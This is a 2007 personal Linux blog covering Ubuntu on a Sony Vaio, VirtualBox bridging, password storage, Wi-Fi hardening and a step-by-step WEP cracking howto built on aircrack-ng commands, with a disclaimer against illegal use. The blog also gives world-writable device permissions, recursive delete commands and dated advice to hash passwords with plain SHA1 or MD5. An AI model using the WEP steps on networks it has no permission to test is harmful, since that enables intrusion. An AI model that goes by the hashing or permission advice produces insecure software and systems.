Friday, December 28, 2007

How to rename the extension of multiple files in ubuntu

Recently I needed to rename the extension of many files in one step.
The 'mv' command didn't work, and I tried with different alternatives, such as using 'for' commands.
Finally, I found that Debian based distributions have the 'rename' command.
The following is the syntax for renaming '.jpg' files to '.jpeg':

rename 's/\.jpg$/.jpeg/' *.jpg

Cheers!

Spanish version:
http://es.tuxero.com/2007/12/cmo-renombrar-la-extensin-de-mltiples.html

Thursday, November 22, 2007

Closed source

I'm working on a project in which I have to connect to a database used by a small ERP software.
The database runs on SQL Server 2005. "No problem!" I thought at all times, because I've been working with SQL Server since its 7.0 release (and I have used SQL Server 2005 practically since it became available).
How disappointed I was when I found that the table names were TRAxxx, SUAxxx, STAxxx, etc (where xxx is a number). There are several prefixes, and hundreds of tables for each prefix. I've done reverse engineering in the past, and it doesn't scare me at all (as a matter of fact, I quickly found the tables I need).
I even found that in the tables I examined there are NO enforced relationships. A note to the developers: please read something on referential integrity.

I think there are two main reasons that cause someone to name tables incorrectly:
- Bad database design.
- An attempt to hide database contents.

Without going to the extreme of proposing that these people release the source code, I believe that there are intermediate points. The companies that buy software licenses should own the information, and this includes the possibility of using the data as they see fit.

What I found is regrettable, both in terms of database design and regarding their cryptic way of naming tables.

I think that when we develop software, our work structure should be clear and transparent. We must give our customers the freedom of choice. We have already charged for our work; we do not need to enslave our customers. Let them choose us for our solution's quality rather than for lack of choice.

Spanish version:
http://es.tuxero.com/2007/11/closed-source.html

Friday, October 26, 2007

Blackberry 8800 acquired

I love technology since I was a kid, but lately I am getting irritated with the technological excess.
At moments I feel over-connected. Email accounts, IM, cell phone, SMS, everything demanding my attention. When the idea of having a blackberry came out for work reasons, I really did not want to do it. It felt too much.
Work comes first, so I finally acquired a Blackberry 8800.

How wrong I was.

Now that I have it, I wonder how did I manage to live before without it. Beyond that "it's a cool gadget", its utility is incredible.
The graphical interface is not that pretty, functionality is maximized, leaving aside the design. I don't complain, but I think they could have done it 'just a little bit' more cute.

I think that the best thing I have to say about it is that before I worried about having to check my mail. Many times I was working in the street, visiting clients, without time to go somewhere with WiFi (they are rare in my city) and open my notebook. That anxiety disappeared. Emails I care about arrive at my BB, with the push-mail technology. It's fabulous, I feel archaic for having waited so long to have one!

Well, I have to end now, because I have some emails to reply in the BB :-D

Cheers!

Spanish version:
http://www.tuxero.com/2007/10/blackberry-8800-adquirido.html


Sunday, October 14, 2007

Using Ubuntu Gutsy Beta

I'm still using Ubuntu Gutsy Beta, and with much pleasure I discovered that it detects and uses the built-in Memory Stick card reader that comes with my Sony Vaio VGN-N350FE. I must say that previous versions did not detect the card reader.
The system is very stable. The only problem is that eventually I have trouble when shutting down the notebook.
I installed the 'Advanced Desktop Effects Settings' for configuring Compiz Fusion, and it is a very nice way to waste time. It has many effects, some of them very amusing. The previous version didn't have such a detailed configuration utility. It's very cool to completely personalize the desktop effects.
I still have to test the virtualization, but I will probably wait for the final version to be released (it's around the corner!).
In short, it seems that it will be a very good version of Ubuntu, and the truth is that they have widely extended compatibility with notebooks.

Spanish version:
http://www.tuxero.com/2007/10/usando-ubuntu-gutsy-beta.html


Monday, October 1, 2007

Testing Ubuntu Gutsy Beta - Screenshots

I installed Ubuntu Gutsy Gibbon Beta in my Sony Vaio VGN-N350FE for testing.
The installation went almost without problems. The only thing is that at one point it threw an error saying that the partition for importing settings was already mounted, even though I indicated not to perform such an import. I clicked the 'Continue' button, and the installation completed correctly.
I find the system very stable. The brightness control works correctly, which means they fixed it (it didn't work in previous versions). Suspension and hibernation also work, though, after trying a few times, I had trouble turning the machine off; I don't know if it is because of this, or for some other reason.
So far, I tested the following things:

Screen configuration
Multiple monitors support is now much more intuitive, editing the /etc/X11/xorg.conf file (which could be cryptic for beginners) is no longer needed.
As you can see in the screenshot, the configuration utility is very intuitive.

Printers configuration
This version includes automatic printer configuration when printers are plugged in. I couldn't test this function, but I have an HP 2600n network printer, and adding it was really simple.
I opened the printers configuration utility.
In this application, I clicked the 'New printer' button. I entered the appropriate values for my printer, and then clicked the 'Forward' button. This opened the drivers selection window. I chose 'HP', and then 'Color Laserjet 2600n'.

Then it asked me to enter the printer name. After doing so, I clicked the button 'Apply'.
Done! The printer was correctly installed. The test page was printed correctly.

Video codecs
I tried to play a video file, and it said that video codecs were not available.
I clicked the 'Search' button, and it found the appropriate codecs.
After selecting them, it prompted for confirmation for installing restricted software.
After this, it was correctly installed.

In short

So far, it is a really stable system, it is more compatible with my notebook, and easier to use. As I continue to test it, I'm going to keep posting testing results.

Cheers!

Friday, September 28, 2007

Ubuntu Gutsy Gibbon (7.10) Beta available

Canonical made public a new beta version of Ubuntu Gutsy Gibbon.
I'm downloading the version, so when I test it, I'm going to comment on how it went. It's an expected version, because it includes better support for notebooks, a graphical configuration tool for X, better support for dual monitors, better support for restricted drivers, Compiz Fusion, AppArmor, NTFS writing support, automatic printer configuration (I want to see this!), desktop search, Gnome 2.20 and a long etcetera.
Link: http://www.ubuntu.com/testing/gutsybeta
Cheers!
Spanish version:
http://www.tuxero.com/2007/09/ubuntu-gutsy-gibbon-710-beta-est.html

Friday, September 21, 2007

How to store passwords in a database

We often write applications that must validate users and permissions. In these cases it is rather common for developers to include fields like 'User' and 'Password' in the users table. It also happens that the passwords are stored in plain text, which brings security problems, as we will see next.
Database administrators should NOT have access to the passwords. Also, if an attacker gains access to the database, he gets a very easy way to obtain the users' passwords.
Besides, depending on the database configuration, it is possible that when we query "SELECT * FROM USERS WHERE USER='my_user' AND PASSWORD='my_password';", the password comparison is case insensitive. This makes it easier for attackers to test different passwords, because the case (upper and lower) is not being validated.
Sometimes developers encrypt the passwords using some encryption algorithm. Care must be taken, for the following reasons:
- In general these algorithms are bidirectional, which means that if we have the encryption key, we can get the original password from the ciphered text.
- Good algorithms are well known and checked by the community of developers and mathematicians. You must not trust those who offer 'magic' formulas or do not want to make the algorithm public.
Solution:
What we must do is hash the password (e.g. using SHA, SHA1, SHA2, MD5, etc.) to obtain a scrambled code from which the original text cannot be obtained. This must be done each time the user supplies a password, be it when logging in or when the user changes his password. Remember to store in the database the result of hashing the password supplied by the user.
When we look for the user, the SQL query would look like this: "SELECT * FROM USERS WHERE USER='my_user' AND PASSWORD='5eb942810a75ebc850972a89285d570d484c89c4';".
Note: before, users could ask the administrators for their password if they forgot it; now you must implement a password blanking routine for these cases.
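
As an added example (not code from the original post), here is one way to implement the scheme above in Python with SQLite. It goes a step beyond the post: instead of a bare SHA or MD5 digest it uses a per-user random salt with PBKDF2-HMAC-SHA256, looks the user up with a bound parameter, and compares the hashes in the application. The table layout, function names, sample accounts and iteration count are assumptions.

```python
import hashlib
import hmac
import os
import sqlite3

ITERATIONS = 600_000  # assumed PBKDF2-HMAC-SHA256 work factor; tune for your hardware
SALT_BYTES = 16


def derive(password: str, salt: bytes, iterations: int) -> bytes:
    """Salted, deliberately slow one-way hash built on SHA-256."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)


def create_schema(conn: sqlite3.Connection) -> None:
    # Hypothetical table layout: the salt and cost are stored next to the hash.
    conn.execute(
        "CREATE TABLE users ("
        " username TEXT PRIMARY KEY,"
        " salt BLOB NOT NULL,"
        " iterations INTEGER NOT NULL,"
        " pw_hash BLOB NOT NULL)"
    )


def set_password(conn, username, password, iterations=ITERATIONS) -> None:
    """Create the account or replace its password (this is also the reset path)."""
    salt = os.urandom(SALT_BYTES)  # fresh random salt on every change
    conn.execute(
        "INSERT OR REPLACE INTO users (username, salt, iterations, pw_hash)"
        " VALUES (?, ?, ?, ?)",
        (username, salt, iterations, derive(password, salt, iterations)),
    )


def verify_login(conn, username, password) -> bool:
    # Select by user name only, with a bound parameter. The password never
    # appears in the SQL text, so database collation cannot make the check
    # case insensitive and nothing is concatenated into the query.
    row = conn.execute(
        "SELECT salt, iterations, pw_hash FROM users WHERE username = ?",
        (username,),
    ).fetchone()
    if row is None:
        # Unknown user: spend comparable time so the response does not reveal it.
        derive(password, b"\x00" * SALT_BYTES, ITERATIONS)
        return False
    salt, iterations, stored = row
    return hmac.compare_digest(derive(password, salt, iterations), stored)


def stored_hash(conn, username) -> bytes:
    return conn.execute(
        "SELECT pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()[0]


def demo(iterations=ITERATIONS) -> dict:
    conn = sqlite3.connect(":memory:")
    create_schema(conn)
    # Constructed sample accounts: two users who chose the same password.
    set_password(conn, "alice", "To be or not to be", iterations)
    set_password(conn, "bob", "To be or not to be", iterations)
    return {
        "good_login": verify_login(conn, "alice", "To be or not to be"),
        "wrong_case": verify_login(conn, "alice", "to be or not to be"),
        "unknown_user": verify_login(conn, "mallory", "To be or not to be"),
        # With per-user salts, equal passwords no longer give equal hashes.
        "salted_hashes_differ": stored_hash(conn, "alice") != stored_hash(conn, "bob"),
    }


if __name__ == "__main__":
    print(demo())
```

Storing the iteration count in each row lets the work factor be raised later: existing hashes keep verifying, and each account moves to the new cost the next time its password is set.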
Hope this helps.

Cheers!


Tuesday, September 18, 2007

Virtual Box 1.5 networking in Ubuntu Feisty

As I published in my previous post, I installed Virtual Box 1.5.
Now that I am using it, I found a couple of problems. First, I wanted to copy the virtual disks (VDI), and to my surprise, to copy the files just won't do the trick. We must use the disks cloning tool, as in the following example:

VBoxManage clonevdi source.vdi destination.vdi

The next problem I had is that the network didn't work in 'Host Interface'. After looking at the help, and a few rounds with google, ubuntuforums and etcetera, I found a way to make it work. Here's a mini howto.
First we install necessary packages:
sudo apt-get install bridge-utils
sudo apt-get install uml-utilities


Then we must define network interfaces. We edit the interfaces file:
sudo gedit /etc/network/interfaces

We add the necessary interfaces (replacing 'user' with the user that will use the virtual machines, and obviously a correct IP):
auto br0
iface br0 inet dhcp
bridge_ports eth0 br0

auto tap0
iface tap0 inet manual
up ifconfig $IFACE 192.168.0.150 up
down ifconfig $IFACE down
tunctl_user user


We restart the network:
sudo /etc/init.d/networking restart


We add the user to the uml-net group:
sudo gpasswd -a user uml-net


According to the help, this should work, but no. I found that for this to work we must execute:
sudo chmod 0666 /dev/net/tun
sudo chmod 0666 /dev/vboxdrv


After this, we may set 'Host Interface', and in the interface name we enter 'tap0'.

And that's it.

Cheers!

Monday, September 17, 2007

HP Laserjet 1018 in Ubuntu Feisty

I recently had to set up a HP Laserjet 1018 printer in Ubuntu Feisty.
Simple as it looks, it is not.
The printer gets added correctly, and when I try to print a test page, the process goes without errors, except: it does not print!
This seems bad enough, because, if it cannot print, at least it should notify the user.
Searching, I found a way to make it work here.
There it says we must download and compile the drivers from here.
Following these steps I was able to install the printer correctly, but nevertheless, it was a rather complex process.
Cheers!


Wednesday, September 5, 2007

Virtual Box 1.5.0 released

Innotek's people amazed me with the new version of Virtual Box.
Virtual Box is an open source virtualization system (free and libre) that allows us to have virtual machines on a host operating system.
I downloaded and installed it in a matter of minutes (I use ubuntu). The installation was a breeze. To install a virtual machine was truly simple.
What amazed me the most was the 'Seamless mode' that allows us to have host operating system windows mixed with the guest operating system windows.
I am a lover of virtualization, due to the great benefits that it provides us. This is great news for me, since other solutions such as VMware Server (free, not libre) are not always easy to install and implement.

I saw it at genbeta.
You can download it at Virtual Box's site.

Cheers!


Monday, September 3, 2007

How to delete useless Windows Files in Ubuntu Linux

After using Windows for a long time, my music and photos folders were filled with 'desktop.ini' and 'Thumbs.db' files. For a while I've been using only Ubuntu Linux, so I decided to delete those files.
To do it, you may use this command (keep in mind that this goes through every subfolder in the selected path, so don't do it on the root folder):

find /my_path -type f -name "desktop.ini" -exec rm -f {} \;
find /my_path -type f -name "Thumbs.db" -exec rm -f {} \;
We may also use this command to delete album covers in our music folders:
find /music_path -type f -name "*.jpg" -exec rm -f {} \;
As you see, this can be used to delete any file (or type of file) recursively in folders. You may use it to delete other files, as long as you take care not to delete files you need or want.
If you want to examine the files that are going to be deleted before doing it, you should execute the same command, changing 'rm' for 'ls', like this:
find /my_path -type f -name "desktop.ini" -exec ls -f {} \;
In this way you may control the list of files to delete.
I hope this helps.

Cheers!


Thursday, August 30, 2007

How to make strong passwords

Our passwords can be guessed or obtained by dictionary attacks. To protect our private data and resources, we must have passwords that cannot be guessed and that don't appear in dictionaries.

Next, a few recommendations to make our passwords more secure:
You must avoid using dates, names and dictionary words.
You should use letters (lower case and upper case), mixed with numbers and symbols.
You should change your passwords periodically.

Given how difficult it may be to remember a password like 'ñF(fh3#"$j9', you can use the following technique to make the task easier:
Think of a phrase (five or more words) that means something to you. In this example I'll use 'To be or not to be'. Then take a number (three or four digits) that you can remember (I'll use 1234). Now, with all this, you take the first letter of each word (one upper case, one lower case) and you mix it with the digits of the number you chose. If you always use the same keyboard layout (or if you can remember it by heart), you may convert numbers into symbols by pressing the 'shift' key.
Following this example, my password would be:
T1b"O3n$Tb

This is just a base, you may alter this idea, for instance you may begin with numbers, or two letters for each number, or use the second letter of each word, etc. Use your imagination!

You now have the basis for having strong passwords easy to remember.

Cheers!

Tuesday, August 28, 2007

How to make a Wireless network more secure

I decided to gather a series of recommendations to make WiFi networks more secure.

Please keep in mind that every system is vulnerable; it is only about reducing the risk of being compromised.

I divide recommendations in two parts: AP (Access Point) and the workstation.

At the AP

  • Change the default SSID. It's not good to keep the factory ones (e.g. Linksys, 3COM, etc.).
  • Change the AP's default password. It is relatively easy to find out the AP's model, and from there to know the default admin password.
  • Deactivate SSID broadcasting. This doesn't add much security, but discourages the 'casual hacker'.
  • Use WPA or WPA2. Don't leave the network without security. WEP is vulnerable (see my other post http://en.tuxero.com/2007/08/howto-crack-wep-sony-vaio.html), however if WPA or WPA2 are not available, WEP is better than nothing.
  • Filter by MAC Address. Even if a MAC address can be changed, this is more complicated for common people.
  • Deactivate DHCP. Unless it is not possible, use static IP addresses.
  • Limit the maximum number of IPs in the DHCP. This would limit the quantity of devices connected (however more devices can be added with static IPs).
  • Turn the AP off when not in use. This is not always possible. For home networks, this option is good, as long as you don't leave your PC turned on for accessing it from the internet.
  • Change the passwords often. With time, passwords can be obtained. Changing them regularly is good practice.
  • Limit the AP power. This is quite effective. It is always good to lower the power at the minimum (verifying that the farthest device can connect correctly). This lowers the chances of connection from distant devices (eg: someone in the street).
  • Choose AP's location wisely. It is good to put the AP in the center of the house, away from windows and exterior walls (see preceding point).
  • Use secure passwords. It is good to use passwords that mix letters, numbers and signs. If possible, use entirely random hexadecimal passwords.
  • Disable the AP's remote administration. This prevents someone outside the network from accessing the AP.
  • Activate Firewall at the AP.

At the workstation

  • Verify who installed the AP. There are APs planted to capture network traffic. You should check it is a legitimate AP.
  • While surfing the net, do not enter passwords, or sensitive information in pages not marked as secure. Before entering credit card numbers, bank or email passwords, check that the site address begins with 'https://'.
  • Do not share public folders. This is a very common mistake: to have shared folders while connecting to a (public) wireless network.
  • Verify you have an active firewall. When connecting to public wifi networks, you are exposed to attack from other devices inside the network.
  • Shut down the wireless card when not in use. Besides the obvious energy savings, an attacker could create an 'ad-hoc' network with the active NIC.
  • Use a VPN. If you have a VPN (generally available in corporate environments), this makes the connection more secure.

Always remember that we are 'just making it more difficult' for hackers. We should avoid making it easy ;-)




Cheers!


HOWTO Crack WEP - Sony Vaio

Based on a professional need, I had to demonstrate that WEP can be cracked. Even though I 'knew' this could be done, I never actually did it myself.

Note: This is only for researching, learning, and security checking purposes. This shouldn't be used to crack networks owned by other people. Attacking and compromising networks (or other resources) is bad, and illegal.

Doing some research, I found that my Sony Vaio VGN N350FE wireless card (an Intel 3945ABG), didn't allow certain things from linux, among them one necessary to demonstrate this vulnerability.

If you read my previous posts, you'll see that this is not the first problem I find with hardware.

It also isn't the first one I find a solution for :-)

I found a howto at http://foro.seguridadwireless.net/index.php?topic=3227.0 that I used as a base.

Next, the steps I followed to crack WEP.

We need a Linux distribution available at http://www.comprawifi.net/public/wifiway/0.6/wifiway-0.6.iso. We download the CD image and we burn it.

We boot the notebook with WifiWay (it must be able to boot from optical drives).

Once started, we open the X:

startx

We set the channel of the AP (Access Point) in the NIC.

echo 'CAPTURE_CHANNEL' > /sys/class/net/wifi0/device/channel

We get the BSSID, the channel and the ESSID.

airodump-ng rtap0

We finish the execution with CONTROL-C, and we set the BSSID (an HEX number with 6 positions) in the NIC.

echo 'AP_BSSID' > /sys/class/net/wifi0/device/bssid

Once we do this, we start capturing.

airodump-ng -c CAPTURE_CHANNEL -w CAPTURE_FILE rtap0

We open a new window and we set speed at 2 mbps:

echo '2' > /sys/class/net/wifi0/device/rate

We activate the nic.

ifconfig wifi0 up

We look for our MAC address, it's the first 12 numbers stated in HWaddr

ifconfig

We initiate an association with the AP.

aireplay-ng -1 0 -a AP_BSSID -h MAC_ADDRESS_WIFI -e AP_ESSID wifi0

We open another terminal and we start injecting traffic:

aireplay-ng -3 -b AP_BSSID -e AP_ESSID -h MAC_ADDRESS_WIFI wifi0

This should increment the number of data packets in the capture window (it takes a while before it starts incrementing).

When we have over 100.000, we may extract the key by executing:

aircrack-ptw CAPTURE_FILE.cap

This should give us the key in hex format.

I hope this is useful to you.




Cheers!


HOWTO Ubuntu Feisty + Sony Vaio VGN N350FE

With some patience, searching in forums, researching, and some luck, I managed to solve the energy problem of my laptop: a Sony Vaio VGN-N350FE using Ubuntu Feisty.

Warning: if you dare to follow this howto, be aware that the system may become unstable, unusable, or worse, like damaging the hardware. Only follow these steps at your own risk.

On a clean installation of Ubuntu Feisty, I update every package proposed by the update manager.

I install the kernel 2.6.22.9 (available in Gutsy), for which we need to include the corresponding repositories.

On the command line we execute:

sudo gedit /etc/apt/sources.list

In the editor, we add the following lines at the end of the file.

deb http://archive.ubuntu.com/ubuntu/ gutsy main restricted
deb http://archive.ubuntu.com/ubuntu/ gutsy universe

Save and close. Then execute this:

sudo apt-get update

After this, it's possible that the update manager offers us to update a bunch of packages (actually from Gutsy). We shouldn't do it. Only do what's stated here.

We execute:

sudo apt-get install linux-backports-modules-2.6.22-9-generic linux-headers-2.6.22-9 linux-headers-2.6.22-9-generic linux-image-2.6.22-9-generic linux-restricted-modules-2.6.22-9-generic linux-ubuntu-modules-2.6.22-9-generic

Since we just installed a new kernel, I believe it's a good idea to restart the notebook. After restarting, we open a new terminal window and we execute:

sudo apt-get install powertop cpufrequtils libncursesw5

Now we must remove Gutsy's repositories. We execute:

sudo gedit /etc/apt/sources.list

We comment the lines we inserted before, by inserting # at the beginning of the lines.

We update the package manager:

sudo apt-get update

Now we make sure that sony's energy management modules are installed. We execute:

sudo modprobe sony_acpi
sudo modprobe sonypi

We make these modules to load automatically on boot:

sudo gedit /etc/modules

We add the two following lines to the end of the file:

sony_acpi
sonypi

We execute this to be able to use brightness controls:

sudo locate -u && for i in $(locate lcd-???-brightness); do sudo cp $i $i.bak; sudo sed -i '1 s|#!/bin/sh|#!/bin/bash|g' $i; done

Now we can add the brightness control to Gnome's Panel. After this, restart the notebook, so the brightness control is active.

When we use our laptop on battery, we need to execute on a terminal:

sudo powertop

This opens a text application that tells us which elements are consuming power, and recommends that we carry out certain actions to improve the battery's use.

Before this, the battery lasted less than half an hour; after this, more than four hours.

For references, I used these posts:

http://www.ubuntugeek.com/howto-upgrade-kernel2622-9-generic-in-feisty-fawn.html
http://ubuntuforums.org/showthread.php?t=479034
http://tuxeando.wordpress.com/2007/05/27/probando-el-nuevo-kernel-2622/




Cheers!


Tuning my notebook

I recently bought a Sony Vaio VGN-N350FE.
At my home office I have an HP 2600n color laser printer, and with my brand new notebook, I cannot print. Windows Vista throws a "Data Execution Prevention" error, and the spool service dies (before this, I never had any troubles - not with Windows XP, not with Ubuntu).
I googled a lot, and I found no solution. It seems to be a compatibility problem between HP drivers and Windows' new version.
This (and other motives) made me decide to install Ubuntu Feisty on this machine. Everything is fantastic, except the energy management issue. Keyboard function keys do not work, and following some tutorials led to no solution (apparently, I have a 'too' new model).
So in the meantime, if I use Windows, I cannot print, and if I use Linux, battery duration is less than acceptable.
I can assure you, my esteemed reader, that this will continue.


First step

Hello!
This is the first tuxero post, with much expectation and desires.
This is a short salutation, since the main thing of this blog is its contents, not the introduction.
Soon, soon, I'll be adding new contents.

Cheers!
